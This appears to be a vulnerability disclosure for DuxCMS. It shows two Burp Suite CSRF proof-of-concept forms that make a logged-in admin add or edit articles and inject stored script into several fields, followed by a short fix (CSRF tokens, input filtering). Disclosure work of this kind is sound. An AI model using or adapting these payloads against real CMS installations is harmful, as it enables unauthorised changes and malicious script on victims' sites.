login in the system,and add article like this.

The captured data packet has an xss vulnerability in the content parameter.

Generate CSRF payload using Burpsuite plugin.

copy that and edit like this.This is a edit article payload
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/edit" method="POST">
<input type="hidden" name="class_id" value="2" />
<input type="hidden" name="title" value="test333333" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="sfdadsfadfa" />
<input type="hidden" name="keywords" value="sfdadsfadfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="test2" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="copyfrom" value="sds&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="views" value="6" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
if you want to edit "test111111"

run this payload like this and it will edit successfully this article content.


access this article and it will alert something like this.

this payload is use add article and input evil javascript in "content" parameter.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/DuxCMS/admin.php?r=article/AdminContent/add" method="POST">
<input type="hidden" name="class_id" value="1" />
<input type="hidden" name="title" value="aaaaaaaaaaaaaaaaaaaaa" />
<input type="hidden" name="image" value="" />
<input type="hidden" name="content" value="sfdadsfadfasfdadsfadf&lt;script&gt;alert(456)&lt;/script&gt; " />
<input type="hidden" name="get_image" value="1" />
<input type="hidden" name="get_image_num" value="1" />
<input type="hidden" name="get_description" value="1" />
<input type="hidden" name="description" value="adfads" />
<input type="hidden" name="keywords" value="adfa" />
<input type="hidden" name="taglink" value="1" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="font_color" value="0" />
<input type="hidden" name="urltitle" value="" />
<input type="hidden" name="url" value="" />
<input type="hidden" name="time" value="2020/01/08 15:49" />
<input type="hidden" name="copyfrom" value="本站" />
<input type="hidden" name="views" value="0" />
<input type="hidden" name="sequence" value="0" />
<input type="hidden" name="tpl" value="" />
<input type="hidden" name="content_id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
run this payload.

and you can see add one article "aaaaaaaaaaaaaaaaa"

access it and it will successfully run some evil javascript like this.

Csrf and xss vulnerabilities are caused because tokens are not set for functions and sensitive characters are filtered.
1)Set token for this function.
2)Filtering sensitive characters for any input data.